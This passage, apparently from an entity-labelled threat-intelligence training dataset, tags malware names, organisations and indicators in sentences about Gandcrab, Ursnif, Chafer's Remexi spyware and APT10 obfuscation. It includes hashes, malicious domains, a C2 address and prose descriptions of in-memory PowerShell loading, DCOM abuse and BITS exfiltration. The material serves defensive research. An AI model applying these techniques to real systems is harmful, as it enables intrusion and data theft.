"It should be noted that because the requested resource is being stored as a string and executed , this all occurs in memory .", 
"spans": {}, "info": {"id": "aptner_train_000134", "source": "aptner_train"}} {"text": "Additional Analysis of the downloaded string is provided in the Gandcrab cradle section below .", "spans": {"Malware: Gandcrab": [[64, 72]]}, "info": {"id": "aptner_train_000135", "source": "aptner_train"}} {"text": "The loop then looks for the method name DownloadData , and if located will download a resource from a second C2 .", "spans": {"System: DownloadData": [[40, 52]], "System: C2": [[109, 111]]}, "info": {"id": "aptner_train_000136", "source": "aptner_train"}} {"text": "This request is then stored in the CommonApplicationData directory ( C:\\ProgramData in Vista and later ) as the hard coded file name ( highlighted in green ) .", "spans": {}, "info": {"id": "aptner_train_000137", "source": "aptner_train"}} {"text": "The script will utilize the hard coded DCOM object C08AFD90-F2A1-11D1-8455-00A0C91F3880 , which is the ClassID for the ShellBrowserWindow .", "spans": {"System: DCOM": [[39, 43]], "System: ShellBrowserWindow": [[119, 137]]}, "info": {"id": "aptner_train_000138", "source": "aptner_train"}} {"text": "A previous blog post by enigma0x3 , detailed how this CLSID can be leveraged to instantiate the ShellBrowserWindow object and call the ShellExecute method , which is the same approach that was taken by the attackers .", "spans": {"System: ShellBrowserWindow": [[96, 114]], "System: ShellExecute": [[135, 147]]}, "info": {"id": "aptner_train_000139", "source": "aptner_train"}} {"text": "This approach has also been used in different Empire modules .", "spans": {"System: Empire": [[46, 52]]}, "info": {"id": "aptner_train_000140", "source": "aptner_train"}} {"text": "The payloads that are downloaded in the above steps are then executed on the system .", "spans": {}, "info": {"id": "aptner_train_000141", "source": "aptner_train"}} {"text": "The first payload that is downloaded via the DownloadString method highlighted above , is a PowerShell one-liner that uses an IF 
statement to evaluate the architecture of the compromised system , and then downloads an additional payload from pastebin.com .", "spans": {"System: DownloadString": [[45, 59]], "System: PowerShell": [[92, 102]], "Indicator: pastebin.com": [[242, 254]]}, "info": {"id": "aptner_train_000142", "source": "aptner_train"}} {"text": "This additional payload is then executed in memory .", "spans": {}, "info": {"id": "aptner_train_000143", "source": "aptner_train"}} {"text": "The image below depicts the contents of the o402ek2m.php file .", "spans": {"Indicator: o402ek2m.php": [[44, 56]]}, "info": {"id": "aptner_train_000144", "source": "aptner_train"}} {"text": "It should be noted that the contents of o402ek2m.php were updated by the attackers to reference different pastebin uploads throughout this campaign .", "spans": {"Indicator: o402ek2m.php": [[40, 52]]}, "info": {"id": "aptner_train_000145", "source": "aptner_train"}} {"text": "Also updated was the function name that is invoked , in the example below it was CJOJFNUWNQKRTLLTMCVDCKFGG , however this was dynamically changed to match the name of the function that would be present in the pastebin file that was being downloaded .", "spans": {}, "info": {"id": "aptner_train_000146", "source": "aptner_train"}} {"text": "Once the raw contents of the pastebin.com post were downloaded , that data would also be executed in memory .", "spans": {"Indicator: pastebin.com": [[29, 41]]}, "info": {"id": "aptner_train_000147", "source": "aptner_train"}} {"text": "In the variants that were obtained during this campaign the file contained a PowerShell script that was approximately 2800 lines .", "spans": {"System: PowerShell": [[77, 87]]}, "info": {"id": "aptner_train_000148", "source": "aptner_train"}} {"text": "This PowerShell script is a version of the Empire Invoke-PSInject module , with very few modifications .", "spans": {"System: PowerShell": [[5, 15]], "System: Empire Invoke-PSInject": [[43, 65]]}, "info": {"id": 
"aptner_train_000149", "source": "aptner_train"}} {"text": "The majority if the modifications are of removing comments and renaming variables .", "spans": {}, "info": {"id": "aptner_train_000150", "source": "aptner_train"}} {"text": "The script will take an embedded PE file that has been base64 encoded and inject that into the current PowerShell process .", "spans": {"System: PE": [[33, 35]], "System: PowerShell": [[103, 113]]}, "info": {"id": "aptner_train_000151", "source": "aptner_train"}} {"text": "The image below is the main function that is being called which in turns calls the function responsible for injecting the embedded PE file .", "spans": {"System: embedded PE file": [[122, 138]]}, "info": {"id": "aptner_train_000152", "source": "aptner_train"}} {"text": "The base64 encoded PE file that can be seen in line 2760 of the image above is a GandCrab Variant .", "spans": {"System: PE": [[19, 21]], "Malware: GandCrab": [[81, 89]]}, "info": {"id": "aptner_train_000153", "source": "aptner_train"}} {"text": "This variant ( the metadata for which is listed below ) is Gandcrab version 5.0.4 .", "spans": {"Malware: Gandcrab": [[59, 67]]}, "info": {"id": "aptner_train_000154", "source": "aptner_train"}} {"text": "krab5.dll : 0f270db9ab9361e20058b8c6129bf30e d6c53d9341dda1252ada3861898840be4d669abae2b983ab9bf5259b84de7525 , Mon Oct 29 17:39:23 2018 UTC . krab5.text : 019bc7edf8c2896754fdbdbc2ddae4ec . krab5.rdata : d6ed79624f7af19ba90f51379b7f31e4 . krab5.data : 1ec7b57b01d0c46b628a991555fc90f0 . krab5.rsrc : 89b7e19270b2a5563c301b84b28e423f . 
krab5.reloc : 685c3c775f65bffceccc1598ff7c2e59 .", "spans": {"Indicator: krab5.dll": [[0, 9]], "Indicator: 0f270db9ab9361e20058b8c6129bf30e": [[12, 44]], "Indicator: d6c53d9341dda1252ada3861898840be4d669abae2b983ab9bf5259b84de7525": [[45, 109]], "Indicator: krab5.text": [[143, 153]], "Indicator: 019bc7edf8c2896754fdbdbc2ddae4ec": [[156, 188]], "Indicator: krab5.rdata": [[191, 202]], "Indicator: d6ed79624f7af19ba90f51379b7f31e4": [[205, 237]], "Indicator: krab5.data": [[240, 250]], "Indicator: 1ec7b57b01d0c46b628a991555fc90f0": [[253, 285]], "Indicator: krab5.rsrc": [[288, 298]], "Indicator: 89b7e19270b2a5563c301b84b28e423f": [[301, 333]], "Indicator: krab5.reloc": [[336, 347]], "Indicator: 685c3c775f65bffceccc1598ff7c2e59": [[350, 382]]}, "info": {"id": "aptner_train_000155", "source": "aptner_train"}} {"text": "The second payload , downloaded via the DownloadData method , is a Ursnif executable .", "spans": {"System: DownloadData": [[40, 52]], "Malware: Ursnif": [[67, 73]]}, "info": {"id": "aptner_train_000156", "source": "aptner_train"}} {"text": "In this instance it is saved to the C:\\ProgramData directory with a pseudo random name .", "spans": {}, "info": {"id": "aptner_train_000157", "source": "aptner_train"}} {"text": "It should be noted that the file name was changed throughout this campaign .", "spans": {}, "info": {"id": "aptner_train_000158", "source": "aptner_train"}} {"text": "Once executed the Ursnif sample will conduct the typical actions observed in Ursnif samples , like credential harvesting , gathering system and process information , and deploying additional malware samples .", "spans": {"Malware: Ursnif": [[18, 24], [77, 83]]}, "info": {"id": "aptner_train_000159", "source": "aptner_train"}} {"text": "The information for this specific sample is listed below .", "spans": {}, "info": {"id": "aptner_train_000160", "source": "aptner_train"}} {"text": "However , numerous Ursnif variants were hosted on the bevendbrec.com site during this campaign .", 
"spans": {"Malware: Ursnif": [[19, 25]], "Indicator: bevendbrec.com": [[54, 68]]}, "info": {"id": "aptner_train_000161", "source": "aptner_train"}} {"text": "Carbon Black was able to discover approximately 120 different Ursnif variants that were being hosted from the domains iscondisth.com and bevendbrec.com . irongreen.exe : 404d25e3a18bda19a238f77270837198 c064f6f047a4e39014a29c8c95526c3fe90d7bcea5ef0b8f21ea306c27713d1f , Sun Dec 18 11:04:31 2011 UTC . irongreen.text : 85aa9117c381eae3d181ab63daab335e . irongreen.rdata : 3e1c774bc4e0ffc2271075e621aa3f3d . irongreen.data : 6c389e5e301564f65dcad4811dbded8b . irongreen.rsrc : efba623cc62ffd0ccbf7f3fbf6264905 . irongreen.reloc : 6cf46599a57a6cbc5d18fbb2883620ce .", "spans": {"Organization: Carbon Black": [[0, 12]], "Malware: Ursnif": [[62, 68]], "Indicator: iscondisth.com": [[118, 132]], "Indicator: bevendbrec.com": [[137, 151]], "Indicator: irongreen.exe": [[154, 167]], "Indicator: 404d25e3a18bda19a238f77270837198": [[170, 202]], "Indicator: c064f6f047a4e39014a29c8c95526c3fe90d7bcea5ef0b8f21ea306c27713d1f": [[203, 267]], "Indicator: irongreen.text": [[301, 315]], "Indicator: 85aa9117c381eae3d181ab63daab335e": [[318, 350]], "Indicator: irongreen.rdata": [[353, 368]], "Indicator: 3e1c774bc4e0ffc2271075e621aa3f3d": [[371, 403]], "Indicator: irongreen.data": [[406, 420]], "Indicator: 6c389e5e301564f65dcad4811dbded8b": [[423, 455]], "Indicator: irongreen.rsrc": [[458, 472]], "Indicator: efba623cc62ffd0ccbf7f3fbf6264905": [[475, 507]], "Indicator: irongreen.reloc": [[510, 525]], "Indicator: 6cf46599a57a6cbc5d18fbb2883620ce": [[528, 560]]}, "info": {"id": "aptner_train_000162", "source": "aptner_train"}} {"text": "While researching this campaign approximately 180 variants were located in the wild .", "spans": {}, "info": {"id": "aptner_train_000163", "source": "aptner_train"}} {"text": "Using the VirusTotal Graph functionality these variants could be organized into several groups that were commonly associated by either 
metadata or document structures like macros or embedded image files ( depicted in the image below ) .", "spans": {"System: VirusTotal Graph": [[10, 26]]}, "info": {"id": "aptner_train_000164", "source": "aptner_train"}} {"text": "The image below highlights the nodes associated with the samples analyzed in this report .", "spans": {}, "info": {"id": "aptner_train_000165", "source": "aptner_train"}} {"text": "The graph can also be viewed in the VTGraph Console for additional exploration .", "spans": {"System: VTGraph Console": [[36, 51]]}, "info": {"id": "aptner_train_000166", "source": "aptner_train"}} {"text": "The graph highlights the at least 3 different variants of Ursnif that were being hosted on the bevendbrec.com site .", "spans": {"Malware: Ursnif": [[58, 64]], "Indicator: bevendbrec.com": [[95, 109]]}, "info": {"id": "aptner_train_000167", "source": "aptner_train"}} {"text": "The Ursnif variants were primarily grouped by C2 infrastructure .", "spans": {"Malware: Ursnif": [[4, 10]], "System: C2": [[46, 48]]}, "info": {"id": "aptner_train_000168", "source": "aptner_train"}} {"text": "The large grouping on the right of the diagram are direct variants of the sample referenced in this write up .", "spans": {}, "info": {"id": "aptner_train_000169", "source": "aptner_train"}} {"text": "Samples in this grouping were all hosted on sites that were called by the second stage .", "spans": {}, "info": {"id": "aptner_train_000170", "source": "aptner_train"}} {"text": "The samples had minor changes , and were presumably changed by the attackers to avoid detection by hash .", "spans": {}, "info": {"id": "aptner_train_000171", "source": "aptner_train"}} {"text": "Word Dropper Variant cc5a14ff026ee593d7d25f213715b73833e6b9cf71091317121a009d5ad7fc36 7ce3d9fc86396fac9865607594395e94 Word Dropper Variant 28a8d6b8a0cdcb25d098e403cc8b6dcb855cb591f0b54c2e3363b5c580d92b28 74c7aed44680100e984251ce2cdbdbc6 Word Dropper Variant 
facbc2cb089668197ca3968a3433b6f4826430c13f7d1c75b44667307c67dfe3 10f308d78adda567d4589803ce18cc9b Word Dropper Variant e714a5147335245c386b105bb7494a8b190b6a737ba28f029561efe48105cd11 f279d0f04874327b85221697d99de321 Word Dropper Variant 56c46ef3d5bd544fa35f6e336d3be93cf36e72d0273fa1dbc915979f2d883e9d bc1b322e7efc19417ab0d0524ccb9ff2 .", "spans": {"Malware: Word Dropper": [[0, 12], [119, 131], [238, 250], [357, 369], [476, 488]], "Indicator: cc5a14ff026ee593d7d25f213715b73833e6b9cf71091317121a009d5ad7fc36": [[21, 85]], "Indicator: 7ce3d9fc86396fac9865607594395e94": [[86, 118]], "Indicator: 28a8d6b8a0cdcb25d098e403cc8b6dcb855cb591f0b54c2e3363b5c580d92b28": [[140, 204]], "Indicator: 74c7aed44680100e984251ce2cdbdbc6": [[205, 237]], "Indicator: facbc2cb089668197ca3968a3433b6f4826430c13f7d1c75b44667307c67dfe3": [[259, 323]], "Indicator: 10f308d78adda567d4589803ce18cc9b": [[324, 356]], "Indicator: e714a5147335245c386b105bb7494a8b190b6a737ba28f029561efe48105cd11": [[378, 442]], "Indicator: f279d0f04874327b85221697d99de321": [[443, 475]], "Indicator: 56c46ef3d5bd544fa35f6e336d3be93cf36e72d0273fa1dbc915979f2d883e9d": [[497, 561]], "Indicator: bc1b322e7efc19417ab0d0524ccb9ff2": [[562, 594]]}, "info": {"id": "aptner_train_000172", "source": "aptner_train"}} {"text": "Ursnif Variant 446ffd272c79554a19b5f4299327fb74b8ff457681d10571caa6eea51ec406b0 ea7e1650031c92b7377788f05926034e Ursnif Variant 42636f3185c9e398958aad272d983c8b8b1409df4ce93f1f8f608e190290f56d 377cd85d8d68fc58976a123aa151c5e0 Ursnif Variant 24b2141c1134ef14f33a38c58342b6573940c5460d03a2945fafac36e32e6889 b73cbffea8094cfa18b067d9568c53e7 Ursnif Variant e53b0a60c238c45019089bdf7f16d5f47b7ba15ca2c918e385c41f0c2076eb52 24fe5a6196e32749cd030ab51824cabe Ursnif Variant 4c8de1713f830819e8354b653fd19a5cafd0bc8fa3145eedf555f24261c874de 589734cb60aa515599c687539c520049 .", "spans": {"Malware: Ursnif": [[0, 6], [113, 119], [226, 232], [339, 345], [452, 458]], "Indicator: 
446ffd272c79554a19b5f4299327fb74b8ff457681d10571caa6eea51ec406b0": [[15, 79]], "Indicator: ea7e1650031c92b7377788f05926034e": [[80, 112]], "Indicator: 42636f3185c9e398958aad272d983c8b8b1409df4ce93f1f8f608e190290f56d": [[128, 192]], "Indicator: 377cd85d8d68fc58976a123aa151c5e0": [[193, 225]], "Indicator: 24b2141c1134ef14f33a38c58342b6573940c5460d03a2945fafac36e32e6889": [[241, 305]], "Indicator: b73cbffea8094cfa18b067d9568c53e7": [[306, 338]], "Indicator: e53b0a60c238c45019089bdf7f16d5f47b7ba15ca2c918e385c41f0c2076eb52": [[354, 418]], "Indicator: 24fe5a6196e32749cd030ab51824cabe": [[419, 451]], "Indicator: 4c8de1713f830819e8354b653fd19a5cafd0bc8fa3145eedf555f24261c874de": [[467, 531]], "Indicator: 589734cb60aa515599c687539c520049": [[532, 564]]}, "info": {"id": "aptner_train_000173", "source": "aptner_train"}} {"text": "GandCrab Variant d6c53d9341dda1252ada3861898840be4d669abae2b983ab9bf5259b84de7525 ce1ee671fe5246a9c40b624ef97e4de1 GandCrab Variant aca0b96126c813b0d29d6fbff9175f8ca62ff2ec6eed83bff76a73ae717cfcb8 07f955796a252771861c8e0db06b1f01 GandCrab Variant 8cd45f8c8f2ed0109db6a64f9945f3dcb8a780f65c76aedded7b8af95e6dc7ec 4fcd0d13ea669a83a749ae5bfb098ca2 GandCrab Variant 933210a9d19b25e0711ae88eece1ba06bb035a01ab2880cc707ff55bdd3b8dd0 8ec87fd3ea777fa8d5160dc957e6683e GandCrab Variant e564e87958b3e76bc9bfeb5bed773b7a17f3a82f84872acdbb609aa43a9cd776 c7d5077960882259b85c01fd41c49ffd .", "spans": {"Malware: GandCrab": [[0, 8], [115, 123], [230, 238], [345, 353], [460, 468]], "Indicator: d6c53d9341dda1252ada3861898840be4d669abae2b983ab9bf5259b84de7525": [[17, 81]], "Indicator: ce1ee671fe5246a9c40b624ef97e4de1": [[82, 114]], "Indicator: aca0b96126c813b0d29d6fbff9175f8ca62ff2ec6eed83bff76a73ae717cfcb8": [[132, 196]], "Indicator: 07f955796a252771861c8e0db06b1f01": [[197, 229]], "Indicator: 8cd45f8c8f2ed0109db6a64f9945f3dcb8a780f65c76aedded7b8af95e6dc7ec": [[247, 311]], "Indicator: 4fcd0d13ea669a83a749ae5bfb098ca2": [[312, 344]], "Indicator: 
933210a9d19b25e0711ae88eece1ba06bb035a01ab2880cc707ff55bdd3b8dd0": [[362, 426]], "Indicator: 8ec87fd3ea777fa8d5160dc957e6683e": [[427, 459]], "Indicator: e564e87958b3e76bc9bfeb5bed773b7a17f3a82f84872acdbb609aa43a9cd776": [[477, 541]], "Indicator: c7d5077960882259b85c01fd41c49ffd": [[542, 574]]}, "info": {"id": "aptner_train_000174", "source": "aptner_train"}} {"text": "Chafer used Remexi malware to spy on Iran-based foreign diplomatic entities Throughout the autumn of 2018 we analyzed a long-standing (and still active at that time) cyber-espionage campaign that was primarily targeting foreign diplomatic entities based in Iran .", "spans": {"Organization: Chafer": [[0, 6]], "Malware: Remexi": [[12, 18]]}, "info": {"id": "aptner_train_000175", "source": "aptner_train"}} {"text": "The attackers were using an improved version of Remexi in what the victimology suggests might be a domestic cyber-espionage operation .", "spans": {"Malware: Remexi": [[48, 54]]}, "info": {"id": "aptner_train_000176", "source": "aptner_train"}} {"text": "This malware has previously been associated with an APT actor that Symantec calls Chafer .", "spans": {"Organization: Symantec": [[67, 75]], "Organization: Chafer": [[82, 88]]}, "info": {"id": "aptner_train_000177", "source": "aptner_train"}} {"text": "The malware can exfiltrate keystrokes, screenshots, browser-related data like cookies and history, decrypted when possible .", "spans": {}, "info": {"id": "aptner_train_000178", "source": "aptner_train"}} {"text": "The attackers rely heavily on Microsoft technologies on both the client and server sides: the Trojan uses standard Windows utilities like Microsoft Background Intelligent Transfer Service (BITS ) bitsadmin.exe to receive commands and exfiltrate data .", "spans": {"Organization: Microsoft": [[30, 39]], "System: Trojan": [[94, 100]], "System: Windows": [[115, 122]], "System: Microsoft Background Intelligent Transfer Service": [[138, 187]], "System: (BITS": [[188, 193]], "Indicator: 
bitsadmin.exe": [[196, 209]]}, "info": {"id": "aptner_train_000179", "source": "aptner_train"}} {"text": "Its C2 is based on IIS using .asp technology to handle the victims’ HTTP requests .", "spans": {"System: C2": [[4, 6]], "System: IIS": [[19, 22]], "Indicator: .asp": [[29, 33]]}, "info": {"id": "aptner_train_000180", "source": "aptner_train"}} {"text": "Remexi developers use the C programming language and GCC compiler on Windows in the MinGW environment .", "spans": {"Malware: Remexi": [[0, 6]], "System: C": [[26, 27]], "System: GCC": [[53, 56]], "System: Windows": [[69, 76]], "System: MinGW": [[84, 89]]}, "info": {"id": "aptner_train_000181", "source": "aptner_train"}} {"text": "They most likely used the Qt Creator IDE in a Windows environment .", "spans": {"System: Qt Creator IDE": [[26, 40]], "System: Windows": [[46, 53]]}, "info": {"id": "aptner_train_000182", "source": "aptner_train"}} {"text": "The malware utilizes several persistence mechanisms including scheduled tasks, Userinit and Run registry keys in the HKLM hive .", "spans": {"System: HKLM": [[117, 121]]}, "info": {"id": "aptner_train_000183", "source": "aptner_train"}} {"text": "XOR and RC4 encryption is used with quite long unique keys for different samples .", "spans": {}, "info": {"id": "aptner_train_000184", "source": "aptner_train"}} {"text": "Among all these random keys, the word “salamati” was also used once, which means “health” in Farsi .", "spans": {}, "info": {"id": "aptner_train_000185", "source": "aptner_train"}} {"text": "Kaspersky Lab products detect the malware described in this report as Trojan.Win32.Remexi and Trojan.Win32.Agent .", "spans": {"Organization: Kaspersky Lab": [[0, 13]], "Indicator: Trojan.Win32.Remexi": [[70, 89]], "Indicator: Trojan.Win32.Agent": [[94, 112]]}, "info": {"id": "aptner_train_000186", "source": "aptner_train"}} {"text": "This blogpost is based on our original report shared with our APT Intelligence Reporting customers last November 2018 .", "spans": {}, 
"info": {"id": "aptner_train_000187", "source": "aptner_train"}} {"text": "The main tool used in this campaign is an updated version of the Remexi malware, publicly reported by Symantec back in 2015 .", "spans": {"Malware: Remexi": [[65, 71]], "Organization: Symantec": [[102, 110]]}, "info": {"id": "aptner_train_000188", "source": "aptner_train"}} {"text": "The newest module’s compilation timestamp is March 2018 .", "spans": {}, "info": {"id": "aptner_train_000189", "source": "aptner_train"}} {"text": "The developers used the GCC compiler on Windows in the MinGW environment .", "spans": {"System: GCC": [[24, 27]], "System: Windows": [[40, 47]], "System: MinGW": [[55, 60]]}, "info": {"id": "aptner_train_000190", "source": "aptner_train"}} {"text": "Inside the binaries the compiler left references to the names of the C source file modules used: operation_reg.c , thread_command.c and thread_upload.c .", "spans": {"System: C": [[69, 70]], "Indicator: operation_reg.c": [[97, 112]], "Indicator: thread_command.c": [[115, 131]], "Indicator: thread_upload.c": [[136, 151]]}, "info": {"id": "aptner_train_000191", "source": "aptner_train"}} {"text": "As the module file names indicate, the malware consists of several working threads dedicated to different tasks, including C2 command parsing and data exfiltration .", "spans": {"System: C2": [[123, 125]]}, "info": {"id": "aptner_train_000192", "source": "aptner_train"}} {"text": "For both the receiving of C2 commands and exfiltration, Remexi uses the Microsoft Background Intelligent Transfer Service (BITS ) mechanism to communicate with the C2 over HTTP .", "spans": {"System: C2": [[26, 28], [164, 166]], "Malware: Remexi": [[56, 62]], "System: Microsoft Background Intelligent Transfer Service": [[72, 121]], "System: (BITS": [[122, 127]]}, "info": {"id": "aptner_train_000193", "source": "aptner_train"}} {"text": "So far, our telemetry hasn’t provided any concrete evidence that shows us how the Remexi malware spread .", "spans": 
{"Malware: Remexi": [[82, 88]]}, "info": {"id": "aptner_train_000194", "source": "aptner_train"}} {"text": "However, we think it’s worth mentioning that for one victim we found a correlation between the execution of Remexi´s main module and the execution of an AutoIt script compiled as PE , which we believe may have dropped the malware .", "spans": {"System: AutoIt": [[153, 159]], "System: PE": [[179, 181]]}, "info": {"id": "aptner_train_000195", "source": "aptner_train"}} {"text": "This dropper used an FTP with hardcoded credentials to receive its payload .", "spans": {}, "info": {"id": "aptner_train_000196", "source": "aptner_train"}} {"text": "FTP server was not accessible any more at the time of our analysis .", "spans": {}, "info": {"id": "aptner_train_000197", "source": "aptner_train"}} {"text": "Remexi boasts features that allow it to gather keystrokes, take screenshots of Windows of interest (as defined in its configuration), steal credentials, logons and the browser history, and execute remote commands .", "spans": {"Malware: Remexi": [[0, 6]], "System: Windows": [[79, 86]]}, "info": {"id": "aptner_train_000198", "source": "aptner_train"}} {"text": "Encryption consists of XOR with a hardcoded key for its configuration and RC4 with a predefined password for encrypting the victim’s data .", "spans": {}, "info": {"id": "aptner_train_000199", "source": "aptner_train"}} {"text": "Remexi includes different modules that it deploys in its working directory, including configuration decryption and parsing, launching victim activity logging in a separate module, and seven threads for various espionage and auxiliary functions .", "spans": {"Malware: Remexi": [[0, 6]]}, "info": {"id": "aptner_train_000200", "source": "aptner_train"}} {"text": "The Remexi developers seem to rely on legitimate Microsoft utilities, which we enumerate in the table below: extract.exe Deploys modules from the .cab file into the working Event Cache directory, bitsadmin.exe Fetches files from 
the C2 server to parse and execute commands .", "spans": {"Organization: Microsoft": [[49, 58]], "Indicator: extract.exe": [[109, 120]], "Indicator: .cab": [[146, 150]], "Indicator: bitsadmin.exe": [[196, 209]], "System: C2": [[233, 235]]}, "info": {"id": "aptner_train_000201", "source": "aptner_train"}} {"text": "Send exfiltrated data, taskkill.exe Ends working cycle of modules .", "spans": {"Indicator: taskkill.exe": [[23, 35]]}, "info": {"id": "aptner_train_000202", "source": "aptner_train"}} {"text": "Persistence modules are based on scheduled tasks and system registry .", "spans": {}, "info": {"id": "aptner_train_000203", "source": "aptner_train"}} {"text": "Mechanisms vary for different OS versions .", "spans": {}, "info": {"id": "aptner_train_000204", "source": "aptner_train"}} {"text": "In the case of old Windows versions like XP , main module events.exe runs an edited XPTask.vbs Microsoft sample script to create a weekly scheduled task for itself .", "spans": {"System: Windows": [[19, 26]], "System: XP": [[41, 43]], "Indicator: events.exe": [[58, 68]], "Indicator: XPTask.vbs": [[84, 94]], "Organization: Microsoft": [[95, 104]]}, "info": {"id": "aptner_train_000205", "source": "aptner_train"}} {"text": "For newer operating systems, events.exe creates task.xml .", "spans": {"Indicator: events.exe": [[29, 39]], "Indicator: task.xml": [[48, 56]]}, "info": {"id": "aptner_train_000206", "source": "aptner_train"}} {"text": "To decrypt the configuration data, the malware uses XOR with 25-character keys such as “waEHleblxiQjoxFJQaIMLdHKz” that are different for every sample .", "spans": {}, "info": {"id": "aptner_train_000207", "source": "aptner_train"}} {"text": "RC4 file encryption relies on the Windows 32 CryptoAPI , using the provided value’s MD5 hash as an initial vector .", "spans": {"System: Windows": [[34, 41]], "System: CryptoAPI": [[45, 54]]}, "info": {"id": "aptner_train_000208", "source": "aptner_train"}} {"text": "Among all these random keys once the 
word “salamati” was also used, which means “health” in Farsi .", "spans": {}, "info": {"id": "aptner_train_000209", "source": "aptner_train"}} {"text": "Config.ini is the file where the malware stores its encrypted configuration data.List of files to send to C2 using bitsadmin.exe from the dedicated thread: upLog.txt , upSCRLog.txt , upSpecial.txt , upFile.txt , upMSLog.txt . http://108.61.189.174 control server HTTP URL .", "spans": {"Indicator: Config.ini": [[0, 10]], "System: C2": [[106, 108]], "Indicator: bitsadmin.exe": [[115, 128]], "Indicator: upLog.txt": [[156, 165]], "Indicator: upSCRLog.txt": [[168, 180]], "Indicator: upSpecial.txt": [[183, 196]], "Indicator: upFile.txt": [[199, 209]], "Indicator: upMSLog.txt": [[212, 223]], "Indicator: http://108.61.189.174": [[226, 247]]}, "info": {"id": "aptner_train_000210", "source": "aptner_train"}} {"text": "KtJvOXulgibfiHk is the password for uploaded zip archives .", "spans": {}, "info": {"id": "aptner_train_000211", "source": "aptner_train"}} {"text": "One of the malware threads checks in an infinite loop if the mouse button was pressed and then also increments the integer iterator infinitely .", "spans": {}, "info": {"id": "aptner_train_000212", "source": "aptner_train"}} {"text": "If the mouse hooking function registers a button hit, it lets the screenshotting thread know about it through a global variable .", "spans": {}, "info": {"id": "aptner_train_000213", "source": "aptner_train"}} {"text": "After that, it checks if the iterator divided by (captureScreenTimeOut/captureActiveWindowTimeOut) has a remainder of 0 .", "spans": {}, "info": {"id": "aptner_train_000214", "source": "aptner_train"}} {"text": "In that case, it takes a screenshot .", "spans": {}, "info": {"id": "aptner_train_000215", "source": "aptner_train"}} {"text": "events.exe : b1fa803c19aa9f193b67232c9893ea57574a2055791b3de9f836411ce000ce31 , c981273c32b581de824e1fd66a19a281 , GCC compiler in MinGW environment version 2.24, I386 Windows GUI EXE 
.", "spans": {"Indicator: events.exe": [[0, 10]], "Indicator: b1fa803c19aa9f193b67232c9893ea57574a2055791b3de9f836411ce000ce31": [[13, 77]], "Indicator: c981273c32b581de824e1fd66a19a281": [[80, 112]], "System: GCC": [[115, 118]], "System: MinGW": [[131, 136]], "System: Windows": [[168, 175]], "System: GUI": [[176, 179]], "System: EXE": [[180, 183]]}, "info": {"id": "aptner_train_000216", "source": "aptner_train"}} {"text": "After checking that the malware is not already installed , it unpacks HCK.cab using the Microsoft standard utility expand.exe .", "spans": {"Indicator: HCK.cab": [[70, 77]], "Organization: Microsoft": [[88, 97]], "Indicator: expand.exe": [[115, 125]]}, "info": {"id": "aptner_train_000217", "source": "aptner_train"}} {"text": "Splitter.exe : a77f9e441415dbc8a20ad66d4d00ae606faab370ffaee5604e93ed484983d3ff , 1ff40e79d673461cd33bd8b68f8bb5b8 , 2017.08.06 11:32:36 (GMT), I386 Windows Console EXE .", "spans": {"Indicator: Splitter.exe": [[0, 12]], "Indicator: a77f9e441415dbc8a20ad66d4d00ae606faab370ffaee5604e93ed484983d3ff": [[15, 79]], "Indicator: 1ff40e79d673461cd33bd8b68f8bb5b8": [[82, 114]], "System: Windows": [[149, 156]], "System: Console": [[157, 164]], "System: EXE": [[165, 168]]}, "info": {"id": "aptner_train_000218", "source": "aptner_train"}} {"text": "Exfiltration is done through the bitsadmin.exe utility .", "spans": {"Indicator: bitsadmin.exe": [[33, 46]]}, "info": {"id": "aptner_train_000219", "source": "aptner_train"}} {"text": "The BITS mechanism has existed since Windows XP up to the current Windows 10 versions and was developed to create download/upload jobs, mostly to update the OS itself .", "spans": {"System: BITS": [[4, 8]], "System: Windows XP": [[37, 47]], "System: Windows 10": [[66, 76]]}, "info": {"id": "aptner_train_000220", "source": "aptner_train"}} {"text": "The vast majority of the users targeted by this new variant of Remexi appear to have Iranian IP addresses .", "spans": {"Malware: Remexi": [[63, 69]]}, "info": 
{"id": "aptner_train_000221", "source": "aptner_train"}} {"text": "Some of these appear to be foreign diplomatic entities based in the country .", "spans": {}, "info": {"id": "aptner_train_000222", "source": "aptner_train"}} {"text": "The Remexi malware has been associated with an APT actor called Chafer by Symantec .", "spans": {"Malware: Remexi": [[4, 10]], "Organization: Chafer": [[64, 70]], "Organization: Symantec": [[74, 82]]}, "info": {"id": "aptner_train_000223", "source": "aptner_train"}} {"text": "One of the human-readable encryption keys used is “salamati” .", "spans": {}, "info": {"id": "aptner_train_000224", "source": "aptner_train"}} {"text": "This is probably the Latin spelling for the word “health” in Farsi .", "spans": {}, "info": {"id": "aptner_train_000225", "source": "aptner_train"}} {"text": "Among the artifacts related to malware authors, we found in the binaries a .pdb path containing the Windows user name “Mohamadreza New” .", "spans": {"Indicator: .pdb": [[75, 79]], "System: Windows": [[100, 107]]}, "info": {"id": "aptner_train_000226", "source": "aptner_train"}} {"text": "Interestingly, the FBI website for wanted cybercriminals includes two Iranians called Mohammad Reza, although this could be a common name or even a false flag .", "spans": {"Organization: FBI": [[19, 22]]}, "info": {"id": "aptner_train_000227", "source": "aptner_train"}} {"text": "Activity of the Chafer APT group has been observed since at least 2015 , but based on things like compilation timestamps and C&C registration, it’s possible they have been active for even longer .", "spans": {"Organization: Chafer": [[16, 22]]}, "info": {"id": "aptner_train_000228", "source": "aptner_train"}} {"text": "Defeating Compiler-Level Obfuscations Used in APT10 Malware .", "spans": {"Organization: APT10": [[46, 51]]}, "info": {"id": "aptner_train_000229", "source": "aptner_train"}} {"text": "The Carbon Black Threat Analysis Unit ( TAU )", "spans": {"Organization: The Carbon Black Threat 
Analysis Unit": [[0, 37]], "Organization: TAU": [[40, 43]]}, "info": {"id": "aptner_train_000230", "source": "aptner_train"}} {"text": "recently analyzed a series of malware samples that utilized compiler-level obfuscations .", "spans": {}, "info": {"id": "aptner_train_000231", "source": "aptner_train"}} {"text": "For example ,", "spans": {}, "info": {"id": "aptner_train_000232", "source": "aptner_train"}} {"text": "opaque predicates were applied to Turla mosquito and APT10 ANEL .", "spans": {"Organization: Turla": [[34, 39]], "Malware: mosquito": [[40, 48]], "Organization: APT10": [[53, 58]], "Malware: ANEL": [[59, 63]]}, "info": {"id": "aptner_train_000233", "source": "aptner_train"}} {"text": "Another obfuscation ,", "spans": {}, "info": {"id": "aptner_train_000234", "source": "aptner_train"}} {"text": "control flow flattening ,", "spans": {}, "info": {"id": "aptner_train_000235", "source": "aptner_train"}} {"text": "was applied to APT10 ANEL and Dharma ransomware packer .", "spans": {"Organization: APT10": [[15, 20]], "Malware: ANEL": [[21, 25]], "Malware: Dharma": [[30, 36]]}, "info": {"id": 